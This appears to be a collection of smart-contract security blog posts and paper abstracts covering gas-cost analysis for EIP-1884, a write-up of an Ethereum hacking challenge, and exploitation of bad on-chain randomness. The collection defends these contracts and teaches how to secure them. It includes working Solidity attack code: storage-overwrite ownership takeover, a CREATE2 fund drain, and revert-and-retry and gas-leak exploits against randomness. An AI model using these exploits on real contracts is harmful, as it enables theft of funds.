require((msg.value >= stor___function_selector__));
  emit 0xafd096c64445a293507447c2ecb78f03b4f5459ec28b8e9bfe113c35b75d624a(address(msg.sender), msg.value, 0x447);
  exit();

No source code available. Note that this contract would work if LOGx gas cost is reduced.

Aragon’s DepositableDelegateProxy

function isDepositable() public view returns (bool) {
        return DEPOSITABLE_POSITION.getStorageBool();
    }
    event ProxyDeposit(address sender, uint256 value);
    function () external payable {
        // send / transfer
        if (gasleft() < FWD_GAS_LIMIT) {
            require(msg.value > 0 && msg.data.length == 0);
            require(isDepositable());
            emit ProxyDeposit(msg.sender, msg.value);
        } else { // all calls except for send or transfer
            address target = implementation();
            delegatedFwd(target, msg.data);
        }
    }
}

Note that this contract would work if LOGx gas cost is reduced. According to the contract-library analysis, the fallback function may fail due to anything between 2308 and 2438 gas. Issue at Aragon

How does the static analysis on contract-library.com work?

Static program analysis is a technique that considers all of a program’s behaviors without having to execute the program. Static analysis is generally thought to be expensive, but over the years we have developed techniques to counter this. Firstly, we developed new techniques in the area of “declarative program analysis”, which simplifies analysis implementations. Secondly, we have applied our analyses at scale, which makes them worth the effort. Contract-library’s internal analysis framework decompiles all smart contracts on the main Ethereum network and most popular testnets to an intermediate representation (IR) amenable to analysis. The decompilation framework is described in a 2019 research paper. Following this analysis, many “client analyses” are applied. These analyses all benefit from a rich suite of analysis primitives, such as gas cost analysis (similar to worst-case execution analysis), memory contents analysis, etc. These are instantiated and customized in each client analysis. Finally, we encode all our analyses, decompilers, etc. in a declarative language, and automatically synthesize a fast C++ implementation using Soufflé.

For illustration, the FALLBACK_WILL_FAIL static analysis is encoded in the following simplified Datalog spec, deployed on contract-library.com:

% Restrict the edges that form the possible paths to those in fallback functions
FallbackFunctionBlockEdge(from, to) :-
   GlobalBlockEdge(from, to), 
   InFunction(from, f), FallbackFunction(f),
   InFunction(to, g), FallbackFunction(g).
% Analyze the fallback function paths with the
% conventional gas semantics, taking shortest paths
GasCostAnalysis = new CostAnalysis(
  Block_Gas, FallbackFunctionBlockEdge, 2300, min
).
% Analyze the fallback function paths with the
% updated gas semantics, taking shortest paths
EIP1884GasCostAnalysis = new CostAnalysis(
  EIP1884Block_Gas, FallbackFunctionBlockEdge, 2300, min
).
FallbackWillFailAnyway(n - 2300) :-
   GasCostAnalysis(*, n), n > 2300.
% fallback will fail with n - m additional gas
EIP1884FallbackWillFail(n - m) :-
   EIP1884GasCostAnalysis(block, n), n > 2300,
   GasCostAnalysis(block, m),
   !FallbackWillFailAnyway(*).

The analysis performs a gas cost computation over all possible paths in the fallback functions, using the gas cost semantics of both PRE and POST EIP-1884. In cases where there is a path that can complete in the former semantics but not the latter, we flag the smart contract.
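For readers less familiar with Datalog, the same idea can be approximated in Python. This is a minimal sketch, not the deployed analysis: it assumes the fallback is given as a graph of basic blocks with a known gas cost per block, and the block names and gas figures in the example are hypothetical.

```python
import heapq

STIPEND = 2300  # gas forwarded by send/transfer

def cheapest_path_gas(edges, block_gas, entry):
    """Minimum total gas over any path from `entry` to a block with no successors."""
    best = {entry: block_gas[entry]}
    heap = [(block_gas[entry], entry)]
    while heap:
        cost, block = heapq.heappop(heap)
        if cost > best.get(block, float("inf")):
            continue  # stale queue entry
        successors = edges.get(block, [])
        if not successors:
            return cost  # first exit block popped is the cheapest (Dijkstra)
        for nxt in successors:
            new_cost = cost + block_gas[nxt]
            if new_cost < best.get(nxt, float("inf")):
                best[nxt] = new_cost
                heapq.heappush(heap, (new_cost, nxt))
    return None  # no exit reachable

def fallback_newly_fails(edges, old_gas, new_gas, entry):
    """True if the cheapest path fits in the stipend before repricing but not after."""
    old = cheapest_path_gas(edges, old_gas, entry)
    new = cheapest_path_gas(edges, new_gas, entry)
    return old is not None and new is not None and old <= STIPEND < new

# Hypothetical fallback with two paths; only the entry block is repriced.
edges = {"entry": ["a", "b"], "a": ["exit"], "b": ["exit"], "exit": []}
old_gas = {"entry": 300, "a": 1900, "b": 2500, "exit": 50}
new_gas = {"entry": 900, "a": 1900, "b": 2500, "exit": 50}
print(fallback_newly_fails(edges, old_gas, new_gas, "entry"))
```

As in the Datalog spec, a fallback whose cheapest path already exceeded 2300 gas before repricing is not flagged, since the change does not make it any worse.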

Gigahorse: Thorough, Declarative Decompilation of Smart Contracts

The rise of smart contracts (autonomous applications running on blockchains) has led to a growing number of threats, necessitating sophisticated program analysis. However, smart contracts, which transact valuable tokens and cryptocurrencies, are compiled to very low-level bytecode. This bytecode is the ultimate semantics and means of enforcement of the contract.

We present the Gigahorse toolchain. At its core is a reverse compiler (i.e., a decompiler) that decompiles smart contracts from Ethereum Virtual Machine (EVM) bytecode into a high-level 3-address code representation.


Chronicle of an Attack Foretold

Co-written with Neville Grech

In a few hours, an attacker will claim the prize for the first Consensys Diligence Ethereum hacking challenge. Here’s how they’ll do it, why nobody else can perform the same attack (any longer), and why the attacker has to wait…

The challenge consisted of a smart contract submitted to the mainnet, without sources. The contract is meant to be decoded, attacked, and drained of its minimal funds. The draining account will then get an off-contract bounty.

At this point in time, an attacker has not just entered the house but also locked the door behind them, so nobody else can enter. (Which is also why we stopped looking into the challenge and are instead writing this text.) But, interestingly, the attacker has to wait until the Constantinople rollout enables the CREATE2 opcode, for the second step of the attack to take place!

To understand the challenge, let’s look at a decompiled version of the contract. We are using our favorite decompiler — our own service, contract-library.com, applied on the challenge contract.

As it turns out, the challenge requires solving two sub-problems: first, gaining ownership of the contract, in order to enable a delegatecall to a contract that the attacker controls, and, second, circumventing checks over the bytecode of the contract getting delegatecall-ed: the contract cannot contain instructions create, call, callcode, delegatecall, staticcall, selfdestruct. Let’s look at both sub-problems in detail, and see how they are solved.

Challenge Problem 1

In the decompiled code, one can notice that there are two arrays, with guessed names array_0 and owners. The latter is used to check whether the caller has the required privileges to perform the final part of the attack. Although there are no setters for owners, one can still pollute the data stored in it, as all arrays are stored in the same address space. The length of the first array in the deployed contract was set to maxint: a size that allows overflow, so that an attacker can write anywhere in storage.

Per standard convention for (dynamic) storage arrays, their lengths are stored in storage locations 0 and 1, while their contents are stored at storage locations keccak256(0) and keccak256(1), respectively. One can therefore compute the offset of the contents of owners and of the length of owners (as well as that of array_0) relative to the start of the contents of array_0, as can be seen in the following “attacker’s” code:

function offsets() private returns (uint, uint, uint) {
  uint array0start = uint(keccak256(abi.encodePacked(uint(0))));
  uint array1start = uint(keccak256(abi.encodePacked(uint(1))));
  uint contentOffset  = array1start - array0start;
  uint lengthOffset = uint(-array0start);
  return (contentOffset, lengthOffset, lengthOffset + 1);
}
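The wrap-around arithmetic in offsets() can be checked off-chain. The Python sketch below assumes the two base slots are the commonly cited keccak256 hashes of the 32-byte encodings of 0 and 1; the identities it checks hold for any pair of base slots, so the exact constants do not affect the reasoning. The helper slot_written is ours: it models an unchecked write to array_0[index].

```python
WORD = 2**256  # storage slot arithmetic wraps modulo 2^256

# Assumed values of keccak256(uint256(0)) and keccak256(uint256(1)).
ARRAY0_START = 0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
ARRAY1_START = 0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6

def offsets(array0_start, array1_start):
    """Indices into array_0 that land on owners[0], slot 0 and slot 1."""
    content_offset = (array1_start - array0_start) % WORD
    length_offset = (-array0_start) % WORD
    return content_offset, length_offset, (length_offset + 1) % WORD

def slot_written(array0_start, index):
    """Storage slot touched by an unchecked write to array_0[index]."""
    return (array0_start + index) % WORD

content, length0, length1 = offsets(ARRAY0_START, ARRAY1_START)
print(hex(slot_written(ARRAY0_START, content)))  # start of owners' contents
print(slot_written(ARRAY0_START, length0))       # slot holding array_0's length
print(slot_written(ARRAY0_START, length1))       # slot holding owners' length
```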

Since the challenge contract allows overflow of the array_0 contents area, these offsets let us write into owners, and also change the length of owners. In fact, the attacker did not stop there! They also set the length of array_0 to 0, so that no future attacker can employ the same overflow.

function attack() public {
  address attackerAddress = address(...);
  address victim = address(0x68Cb...);
  (uint contentOffset, uint lengthOffset0, uint lengthOffset1) 
      = offsets();
  bool success;
  bytes memory result;
  // set address I control as one of the owners
  victim.call(abi.encodeWithSelector(
      bytes4(0x4214352d), uint(attackerAddress), contentOffset)
  );
  
  // set length of array 0 to 0 (no more out of bounds)
  victim.call(abi.encodeWithSelector(
      bytes4(0x4214352d), uint(0), lengthOffset0)
  );
  
  // set length of array 1 to 1 (make attacker the only owner)
  victim.call(abi.encodeWithSelector(
      bytes4(0x4214352d), uint(1), lengthOffset1)
  );  
}

The contract registered as owner (attackerAddress) can be any that the attacker controls. Now the attacker has both entered and secured the door! But the more serious challenge is still up ahead.

Challenge Problem 2

The second part of the challenge is the actual draining of the contract’s funds. This involves creating yet another attacker contract that will simply drain the contract’s balance. If one checks function 0x2918435f of the challenge contract, the code calls delegatecall on an attacker-supplied address parameter, effectively handing it full control of the account. There is a small twist to this plot however. The delegatecall is preceded by checks of all the bytecodes of the called contract, to ensure that they never match values 0xf0, 0xf1, 0xf2, 0xf4, 0xfa, or 0xff. This precludes use of instructions create, call, callcode, delegatecall, staticcall, and selfdestruct.

Currently (Feb. 27), these are the only instructions that can be used to drain a contract of its funds. In a few hours, however, a new bytecode instruction (create2) will be available and it can also move funds! Hence the attacker now only needs to pass in the address of a smart contract implementing something similar to this:

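contract BountyClaimer {    
    function() external {
        uint res;
        assembly {
            // create2(value, offset, size, salt): the new contract
            // receives the entire balance of the calling account.
            // Assign to the existing local rather than redeclaring it.
            res := create2(balance(address), 0, 1, 0)
        }
    }
}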

A minor challenge is that byte value 0xff arises commonly in Solidity compilation, so the attacker has to use roundabout ways to compute some values, but this is little more than a nuisance.
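To see why create2 slips through and why 0xff is a nuisance, here is a small Python model of the filter. It assumes the check is a plain byte-by-byte scan of the callee's code, which is our reading of the decompiled contract; the function name and the two bytecode strings are hypothetical, hand-assembled examples rather than the attacker's actual code.

```python
# Byte values the challenge contract rejects, with their EVM mnemonics.
FORBIDDEN = {
    0xF0: "create",
    0xF1: "call",
    0xF2: "callcode",
    0xF4: "delegatecall",
    0xFA: "staticcall",
    0xFF: "selfdestruct",
}
CREATE2 = 0xF5  # not on the list

def forbidden_bytes(code):
    """Return (position, mnemonic) for every rejected byte value in `code`."""
    return [(i, FORBIDDEN[b]) for i, b in enumerate(code) if b in FORBIDDEN]

# PUSH1 0, PUSH1 1, PUSH1 0, ADDRESS, BALANCE, CREATE2
claimer = bytes.fromhex("600060016000303 1f5".replace(" ", ""))
print(forbidden_bytes(claimer))

# PUSH1 0xff: harmless data, but a byte-level scan still rejects it.
push_ff = bytes.fromhex("60ff")
print(forbidden_bytes(push_ff))
```

The second example shows the nuisance mentioned above: a constant containing 0xff trips the scan even though it is never executed as an instruction, so such values have to be computed indirectly.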

We would like to salute the clever attacker that will be executing this attack within the next few hours.

Happy hunting!

Bad Randomness is Even Dicier Than You Think

Co-written with Neville Grech

Trivial Exploits of Bad Randomness In Ethereum, and How To Do On-Chain Randomness (Reasonably) Well

Ethereum has been used as a platform for a variety of applications of financial interest. Several of these have a need for randomness — e.g., to implement a lottery, a competitive game, or crypto-collectibles. Unfortunately, writing a random number generator on a public blockchain is hard: computation needs to be deterministic, so that it can be replayed in a decentralized way, and all data that can serve as sources of randomness are also available to an attacker. Several exploits of bad randomness have been discussed exhaustively in the past. Next, we discuss near-trivial exploits of bad randomness, as well as ways to obtain true randomness in Ethereum.

We begin by showing how easy it often is to exploit bad randomness without complex machinery, such as being a miner or reproducing the attacked contract’s internal state. The key idea is to use information leaks inside a transaction to determine whether the outcome of a random trial favors the attacker: an intra-transaction information leak. This is, to our knowledge, a new flavor of attack. Even though it shares most elements of past attacks on randomness, it generalizes to more contracts and is more easily exploitable.

Before we discuss the interesting aspects of intra-transaction information leaks, a bit of background is useful.

Ethereum Randomness Practices and Threat Model

Much has been written on the topic of random number generation in Ethereum smart contracts. The Ethereum Yellow Paper itself suggests “[approximating randomness with] pseudo-random numbers by utilising data which is generally unknowable at the time of transacting. Such data might include the block’s hash, the block’s timestamp, and the block’s beneficiary address. In order to make it hard for malicious miners to control those values, one should use the BLOCKHASH operation in order to use hashes of the previous 256 blocks as pseudo-random numbers.”

More recent excellent advice on anti-practices and hands-on demonstrations of good practices have helped raise the bar of random number generation in smart contracts, as have several high-profile contracts (e.g., CryptoKitties — more on that later), serving as prototypes. For instance, it is now well understood that the current block number (or contents, or gas price, or gas limit, or difficulty, or timestamp, or miner address) is not a source of randomness. These quantities can be read by any other transaction within the same mined block. Even worse, they can be manipulated if the attacker is also a miner.

Ethereum miners predict the future by inventing it. Furthermore, Ethereum, the distributed “world computer”, is much slower than a physical computer. Therefore, a miner can actively choose to invent a future (i.e., mine a block) whose “random” properties will yield a favorable outcome. In one extreme case, a miner can precompute several alternative “next blocks”, pick the one that favors him/her, and then invest in making this block the next one (e.g., by dedicating more compute power to mine more subsequent blocks).

Therefore, the current understanding of the threat model to pseudo-randomness focuses on the scenario where the attacker is a miner. Thorough, well-considered discussions often recommend avoiding randomness “[that uses] a blockhash, timestamp, or other miner-defined value.” A common guideline is that “BLOCKHASH can only be safely used for a random number if the total amount of value resting on the quality of that randomness is lower than what a miner earns by mining a single block.” (As we discuss at the end, this guideline can be both too conservative and too lax. The expected value of all bets in a single block should be used instead of the “total amount of value”.)

Even though the usual threat model considers the case of a miner, most of the block-related pseudo-random properties can be exploited a lot more easily. The interesting block-related properties of the EVM are (in Solidity syntax) block.coinbase, block.difficulty, block.gaslimit, block.number, block.timestamp, and blockhash. For all these, an attacker can get the same information as the victim contract by just having a transaction in the same block. (The blockhash value is only defined for the previous 256 blocks, the rest of the quantities are only defined for the current block. In both cases, all current-block transactions receive the same values for these quantities.) In this way, an attacker can replay the randomness computation of the attacked contract before deciding whether to take a random bet. Effectively the pattern becomes:

if (replicatedVictimConditionOutcome() == favorable)
   victim.tryMyLuck();

Possible? Yes. Easy? Not quite.

Although the attack just described seems trivial, in practice it requires sophistication. A typical generator of randomness in a contract is often not merely blockhash(block.number-1) or some other such block-relative quantity. Instead, a common pattern mixes a seed value with block-relative quantities — for instance:

function _getRandomNumber(uint _upper) private returns (uint) {
   _seed = uint(keccak256(_seed, 
                          block.blockhash(block.number - 1),
                          block.coinbase, 
                          block.difficulty));
   return _seed % _upper;
}

This does not make the contract less vulnerable, in principle. There is no secret in the blockchain, so even a private _seed variable can be read. But in practice this can make the attack significantly harder. A contract with several users and intense activity will see its private seed modified often enough to be much less predictable. The attacker either needs (again) to be a miner, or needs to somehow coordinate receiving non-stale external information before the attack transaction. A very interesting illustration of both kinds of attacks (both as a miner and as a transaction with external information) shows how they are possible but not before admitting: “So much for a simple solution.”

It’s Easier to Ask For Forgiveness Than to Get Permission

Yet, there is a very simple, non-miner attack that has guaranteed success, even with fast-changing private seeds. The transactional model of Ethereum computation together with the public nature of all stored information make exploitation of bad random number generators near-trivial.

The general pattern is simple. All a contract needs to do to be vulnerable is to finalize in a single transaction (typically before the end of a public call) an outcome that possibly favors the attacker. (This outcome may be determined through any technique producing entropy, including hashing of past blocks, reading the current block number, etc.) The attacker simply executes code such as:

victim.tryMyLuck();
require(victim.conditionOutcome() == favorable);

In other words, the attacker can choose to commit a transaction only when the outcome of a “random” trial is favorable, and abort otherwise. The only cost in the latter case is minor: the gas spent to execute the transaction. The attack works even if there is value transfer in the tryMyLuck() trial: if the transaction aborts, its effects are reverted.

In this transaction-revert-and-retry approach, the attacker turns the code of the victim contract against itself! There is no need to emulate the victim’s randomness calculation, only to check if the result is favorable. This is information that’s typically publicly accessible, or easy for the attacker to leak out of the victim (e.g., via gas computations, as we will discuss later).
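The revert-and-retry pattern can be modelled in a few lines of Python. This is a toy simulation, not EVM code: the Victim class, its deliberately weak "randomness" and the one-attempt-per-block loop are all our assumptions, chosen so the behaviour is easy to follow.

```python
class Revert(Exception):
    """Models a failed require(): the whole transaction is rolled back."""

class Victim:
    def __init__(self):
        self.seed = 0       # "private" seed, still readable on a public chain
        self.winner = None

    def try_my_luck(self, player, block_number):
        # Toy randomness: mixes the seed with a block-relative quantity.
        self.seed = (self.seed * 31 + block_number) % 1_000_003
        if self.seed % 10 == 0:
            self.winner = player

def run_transaction(victim, tx):
    """Run `tx` atomically; on Revert, restore the victim's prior state."""
    snapshot = dict(vars(victim))
    try:
        tx(victim)
        return True
    except Revert:
        vars(victim).clear()
        vars(victim).update(snapshot)
        return False

def attack(victim, player, first_block, max_blocks=1000):
    """Try once per block; return the number of attempts until a win."""
    for block in range(first_block, first_block + max_blocks):
        def tx(v, block=block):
            v.try_my_luck(player, block)
            if v.winner != player:
                raise Revert("unfavorable outcome")  # undo the losing trial
        if run_transaction(victim, tx):
            return block - first_block + 1
    return None

victim = Victim()
attempts = attack(victim, "attacker", first_block=101)
print(attempts, victim.winner)
```

Note that the attacker never predicts the seed. It only observes the result and lets the transaction machinery erase every losing attempt, paying gas but never the stake.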

Practical Examples

There are several examples of contracts that were already vulnerable to past techniques and can be attacked more easily in the way we describe. For a vivid illustration, consider the (defunct?) CryptoPuppies Dapp. CryptoPuppies attempted to build on the CryptoKitties code base and add “rarity assessments for puppies determined by the average between initial CryptoPuppy attributes (Strength + Agility + Intelligence + Speed) / 4”. The code for the contract, however, adds (to the otherwise solid CryptoKitties contract code) a bad random number generator, combining a seed and block properties (including block.blockhash(block.number-1), block.coinbase, and block.difficulty). Furthermore, the result is readily queryable: anyone can read the attributes of a generated puppy. It is trivial for an attacker to try to breed a puppy with the desired attributes and to abort the transaction if the result is not favorable.

In other cases of vulnerable contracts, an attacker can determine a favorable outcome of a battle between dragons and knights, create pets only when they have desired features, set the damage inflicted by heroes or monsters, win a coin toss, and more.

(All contract examples are collected via analysis queries on the bytecode of the entire contents of the blockchain and inspected in source or via our alpha-version decompiler at contract-library.com.)

Hiding State Does Little To Help

The benefit of the attack pattern that cancels the transaction based on outcome is that the outcome of an Ethereum computation is easy to ascertain. In most cases, the vulnerable contract exposes publicly the outcome of a “random” trial. Even when not (i.e., when the outcome of the trial is kept in private storage only) it is easy to have an intra-transaction information leak. Perhaps the most powerful technique for leaking information (regarding what a computation did) is by measuring the gas consumption of different execution paths. Given the widely different gas costs of distinct instructions, this technique is often a reliable way of determining randomness outcomes.

For illustration, consider a rudimentary vulnerable contract:

contract Victim {
   mapping (address => uint32) winners;
    … 
   function draw(uint256 betGuess) public payable {
     require (msg.value >= 1 ether);
     uint16 outcome = badRandom(betGuess);
     if (winning(outcome))
       winners[msg.sender] = outcome;
   }
 }

The contract performs an extra store in the case of a winning outcome. The attacker can trivially exploit this to leak information about the outcome, before the transaction even completes:

contract Attacker {
   function test() public payable {
     Victim v = Victim(address(<address of victim>));
     v.draw.value(msg.value)(block.number); // or any guess
     require (gasleft() < 253000); // or any number that will
                                   // distinguish an extra store
                                   // relative to the original gas
   }
 }
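How might an attacker pick the number in that require? One simple approach is to place the threshold halfway between the two possible gasleft() readings. The Python sketch below assumes the winning path differs only by one store to a previously empty slot, priced at 20,000 gas under the gas schedule in force at the time of writing; the starting figure of 270,000 is a hypothetical measurement, and the function names are ours.

```python
# Cost of writing a non-zero value into an empty storage slot (assumed schedule).
SSTORE_SET_GAS = 20_000

def pick_threshold(gas_left_if_lost):
    """Midpoint between the gasleft() readings of the losing and winning paths."""
    gas_left_if_won = gas_left_if_lost - SSTORE_SET_GAS
    return (gas_left_if_lost + gas_left_if_won) // 2

def attacker_keeps_transaction(gas_left, threshold):
    """Mirrors require(gasleft() < threshold): keep only if the extra store ran."""
    return gas_left < threshold

threshold = pick_threshold(270_000)
print(threshold)
print(attacker_keeps_transaction(250_000, threshold))  # winning path
print(attacker_keeps_transaction(270_000, threshold))  # losing path
```

In practice the attacker would calibrate the losing-path reading with a trial run, since it depends on the gas supplied and on the rest of draw().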

So, What Can One Do? The Blockhash Minus-256 Problem

We saw some of the pitfalls of bad randomness on Ethereum, but what can one do to produce truly random numbers? A standard recommendation is to go off-chain and employ external sources. These are typically either an outside “oracle” service (e.g., Oraclize), or hashed inputs by multiple users with competitive interests. Both solutions have their drawbacks: the former relies on external trust, while the latter is only applicable in specific usage scenarios and may require as much care as designing nearly any cryptographic protocol. Furthermore, the issue with randomness on Ethereum is not the entropy of the bits — after all, there are excellent sources of entropy on the blockchain, yet they are predictable. Therefore, in principle, even external solutions may be vulnerable to transaction-revert-and-retry attacks, if they have not been carefully coded.

Although off-chain solutions have great merit, an interesting question is what one can do to produce random numbers entirely on-chain. There are certainly limitations to such randomness, but it is also quite possible, under strict qualifications. The best recommendation is to use the blockhash of a “future” block, i.e., a block not-yet-known at the time a bet is placed. For instance, a good protocol (formulating a random trial as a “bet”) is the following:

  • accept a bet, with payment, register the block number of the bet transaction
  • in a later transaction, compute the blockhash of the earlier-registered block number, and use it to determine the success of the bet.

The key to the approach is that the hash used for randomness is not known at bet placement time, yet cannot change on future trials. The approach still has limitations in the randomness it can yield, because of miners, who can predict the future (at a cost). We analyze these limitations in the next section, where we collect all randomness qualifications in a single place. Before that, however, we need to consider another caveat of the approach. As mentioned earlier, the blockhash function is only defined for the previous 256 blocks. (In the non-immediate future, EIP-210 aims to change this.) Therefore, if the second step of the above protocol is performed too late (>256 blocks later) or too early (in the same transaction as the first step), the result (zero) of blockhash will be known to an attacker.

Therefore, any protocol using blockhash of “future” blocks needs to integrate extra assumptions. The most practical ones seem to be:

  • the bettor has to not only place the bet but also invoke the contract in a future transaction (within the next 256 blocks) to determine the outcome
  • if the bettor is too late (or too early) the outcome should favor the contract, not a potential attacker.
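The two-step protocol with these extra assumptions can be sketched as a small Python model. It is an illustration under stated assumptions, not contract code: blockhash is simulated with SHA-256 of the block number as a stand-in for real block hashes, and BetContract, win_modulus and the block numbers are hypothetical.

```python
import hashlib

def blockhash(block_number, current_block):
    """Model of BLOCKHASH: zero unless the block is one of the 256 most recent."""
    if block_number >= current_block or block_number < current_block - 256:
        return 0
    digest = hashlib.sha256(str(block_number).encode()).digest()  # stand-in hash
    return int.from_bytes(digest, "big")

class BetContract:
    def __init__(self, win_modulus):
        self.win_modulus = win_modulus  # bettor wins with probability 1/win_modulus
        self.bets = {}                  # bettor -> block number of the bet

    def place_bet(self, bettor, current_block):
        """Step 1: register the block in which the bet was placed."""
        self.bets[bettor] = current_block

    def settle(self, bettor, current_block):
        """Step 2: a later transaction decides the bet from the registered block's hash."""
        bet_block = self.bets.pop(bettor)
        h = blockhash(bet_block, current_block)
        if h == 0:
            return False  # too early or too late: the contract wins
        return h % self.win_modulus == 0

contract = BetContract(win_modulus=1)  # always wins when settled in time
contract.place_bet("alice", 1000)
print(contract.settle("alice", 1001))
```

The important design choice is the default: whenever the hash is unavailable, the bet is lost, so settling in the same block or after the 256-block window never helps an attacker.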

Some smart contracts have attempted to circumvent the need for the second step with solutions that may be acceptable in context. A good example is the randomizer in the CryptoKitties GeneScience contract. (This contract seems to have no publicly available source code, unlike the CryptoKitties front-end contract, so we examine its decompiled intermediate-language version.) In function mixGenes, one can see code of the form:

v22b_a = block.blockhash(varg2);
if (!v22b_a) {
  v22b_c = ((block.number & -0x100) + (varg2 & 0xff));
  if ((v22b_c >= block.number)) {
    v22b_c = v22b_c - 256;
  }
  v22b_a = block.blockhash(v22b_c);
}

That is, if the block number of the bet is older than 256 blocks back (i.e., blockhash returns zero) the current block number’s high bits are merged with the older block’s lower bits, possibly with 256 subtracted, so as to produce a block number within the 256 most recent, whose blockhash is taken.
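The bit manipulation is easier to follow with concrete numbers. The Python function below mirrors the decompiled arithmetic; the function name and the sample block numbers are ours.

```python
def fallback_block(bet_block, current_block):
    """Block number substituted when the bet's own blockhash is no longer available."""
    # High bits of the current block number, low 8 bits of the bet's block number.
    candidate = (current_block & -0x100) + (bet_block & 0xFF)
    if candidate >= current_block:
        candidate -= 256  # step back so the block is in the past
    return candidate

print(fallback_block(300, 1000))
print(fallback_block(500, 1000))
```

In both cases the result lies within the 256 blocks before the current one and shares its low 8 bits with the original bet block, which is why a retry only sees a different hash once the high bits of the block number change.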

Such code can be well exploited with the transaction-revert-and-retry approach. The benefit of hashing an unknown-at-betting-time block is lost, instead sampling a predictable quantity, whose outcome may vary upon a retry. However, retries will yield different values only every 256 blocks — once the high bits of the block number change. In the specific context of the application (where other players can breed the same crypto-kitty) this risk is probably acceptable.

Putting it All Together

Based on the above, let us consider an end-to-end recommendation for purely-on-chain randomness. Computing the blockhash of a “future” block is a pattern that can yield truly unknown bits to the current transaction, but is still vulnerable to miners: a miner can place a bet, then mine more than one version of the “future” block. Therefore, for safe use of blockhash, the expected value of the random trial for an attacker should be lower than the reward of mining a block: an attacker should never benefit from throwing away non-winning blocks. Note that this expected value may be much lower than the total stakes riding on the randomness. For instance, a bet awarding 1000 ETH with probability 1/1000 is still only worth 1 ETH to an attacker. Such randomness could, therefore, be quite practical for many applications.

However, in computing the expected value of a random trial it is important to remember that bets are compounding. If a single block contains N bets (e.g., in N independent transactions, which could be by the same attacker), each for 1000 ETH, and each with 1/1000 probability, the expected value of the block for the attacker is N ETH. This reasoning can be used to bound the maximum number of bets accepted in the same transaction. Unfortunately, a single contract cannot know what other bets are taken by other contracts’ transactions in a single block, and an attacker could well be targeting multiple contracts to compound bets. Therefore, the estimate will be either approximate, or too conservative, yielding very low expected values per bet. Even worse, a badly-coded contract can incentivize attackers to violate the randomness of an unrelated contract, at least temporarily. The attacker/miner has an incentive in exploiting the badly-coded, vulnerable contract, and an extra opportunity to also take bets against a contract that wouldn’t be profitable on its own. (The attacker may not be able to exploit the weaker contract more, e.g., because it has limits in the bets per block, but can fit in more transactions in the same block.) Still, such an attack is only valid until the badly-coded contract is depleted.

A back-of-the-envelope calculation of pessimistic values with the current block mining reward (3 ETH) and block gas limit (8 million) suggests that an expected value of an individual bet at under 3.75E-7 ETH-per-unit-of-gas is safe for steady-state use, even if temporarily vulnerable (until depletion of other contracts). For instance, a transaction consuming 100,000 gas should result in bets with expected return at most 0.0375 ETH. (If the block was filled with such transactions, it would still be unprofitable for an attacker-miner to throw it away.) This is currently around 50x the gas cost of such a transaction, so the bet value is not unrealistically low for real applications. Again, this does not limit the payoff of the bet but the expected return. The successful bet could result in 1M ETH, but if this only happens with probability 1/27,000,000, the expected bet value is under 0.0375 ETH.
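The numbers in this calculation can be reproduced with exact fractions. The Python sketch below uses only the figures quoted in the text (a 3 ETH block reward and an 8 million block gas limit); the function names are ours.

```python
from fractions import Fraction

BLOCK_REWARD_ETH = Fraction(3)
BLOCK_GAS_LIMIT = 8_000_000

# A block full of bets must be worth less than the reward for mining it.
max_ev_per_gas = BLOCK_REWARD_ETH / BLOCK_GAS_LIMIT

def max_safe_expected_value(gas_used):
    """Largest expected bet value (in ETH) for a transaction using `gas_used` gas."""
    return max_ev_per_gas * gas_used

def expected_value(payoff_eth, probability):
    """Expected value of a single bet, in ETH."""
    return Fraction(payoff_eth) * probability

print(float(max_ev_per_gas))
print(float(max_safe_expected_value(100_000)))
print(float(expected_value(1_000_000, Fraction(1, 27_000_000))))
```

The last line confirms that a 1M ETH payoff at odds of 1 in 27,000,000 stays just under the 0.0375 ETH bound for a 100,000-gas transaction.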

More generally, such reasoning motivates an interesting practice that we have not seen adopted so far: to make bets consume gas proportionately to their expected value. For instance, a bet with a high expected value, e.g., of 2 ETH, should be perfectly possible but should require gas nearly equal to the block gas limit (i.e., the caller should know to supply the gas and the bet contract should consume it via extra computation), so that virtually no other transactions can be part of the same block.

[Standard caveat: all analysis assumes an attacker is incentivized only to maximize his/her profit in ETH (or tokens) based on smart contract execution. There may be attack models not considered, although most conventional attacks (e.g., double spending through chain reorg) don’t seem to benefit from throwing away a block. However, notably, the assumption does not apply to an attacker willing to lose ETH to perpetrate an attack (e.g., in order to cause damages to the victim, or to disrupt the ecosystem in order to manipulate ETH exchange rates, or …). Such attack conditions are a topic for a different post, but much of Ethereum is vulnerable to such attacks.]

To summarize, our recommendation for on-chain random number generation is to follow a pattern such as:

  • Accept a bet, with payment, register the block number of the bet transaction.
  • The bettor has to not only place the bet but also invoke the contract in a future transaction (within the next 256 blocks). The contract will compute the blockhash of the earlier-registered block number, and use it to determine the success of the bet.
  • If the bettor is too late (or too early) the outcome should favor the contract, not a potential attacker.
  • The expected value of the random trial for all bets in a single block should be lower than the reward for mining a block. (You should convince yourself that this calculation works in your favor.)

This approach has the disadvantages of a delay until a bet outcome is revealed, of requiring a second transaction, and of placing severe limits on the expected value of the bet. It is, however, otherwise the only known quasi-acceptable technique for purely-on-chain randomness.

Madmax: Surviving Out-of-gas Conditions in Ethereum Smart Contracts

Ethereum is a distributed blockchain platform, serving as an ecosystem for smart contracts: full-fledged inter-communicating programs that capture the transaction logic of an account. Unlike programs in mainstream languages, a gas limit restricts the execution of an Ethereum smart contract: execution proceeds as long as gas is available. Thus, gas is a valuable resource that can be manipulated by an attacker to provoke unwanted behavior in a victim’s smart contract (e.g., wasting or blocking funds of said victim). Gas-focused vulnerabilities exploit undesired behavior when a contract (directly or through other interacting contracts) runs out of gas. Such vulnerabilities are among the hardest for programmers to protect against, as out-of-gas behavior may be uncommon in non-attack scenarios and reasoning about it is far from trivial.

In this paper, we classify and identify gas-focused vulnerabilities, and present MadMax: a static program analysis technique to automatically detect gas-focused vulnerabilities with very high confidence. Our approach combines a control-flow-analysis-based decompiler and declarative program-structure queries. The combined analysis captures high-level domain-specific concepts (such as “dynamic data structure storage” and “safely resumable loops”) and achieves high precision and scalability. MadMax analyzes the entirety of smart contracts in the Ethereum blockchain in just 10 hours (with decompilation timeouts in 8% of the cases) and flags contracts with a (highly volatile) monetary value of over $2.8B as vulnerable. Manual inspection of a sample of flagged contracts shows that 81% of the sampled warnings do indeed lead to vulnerabilities, which we report on in our experiment.

1 INTRODUCTION

